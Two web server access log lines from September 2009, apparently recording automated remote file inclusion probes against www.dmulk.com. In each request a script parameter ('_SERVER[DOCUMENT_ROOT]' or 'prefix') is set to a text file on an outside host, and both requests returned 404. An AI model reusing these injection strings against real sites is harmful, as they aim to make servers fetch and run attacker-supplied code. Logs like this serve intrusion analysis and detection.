66.135.35.40 - - [16/Sep/2009:12:39:24 -0700] "GET /logs/access_090305.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
114.4.8.14 - - [16/Sep/2009:12:39:24 -0700] "GET /includes/stats.inc.php?prefix=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
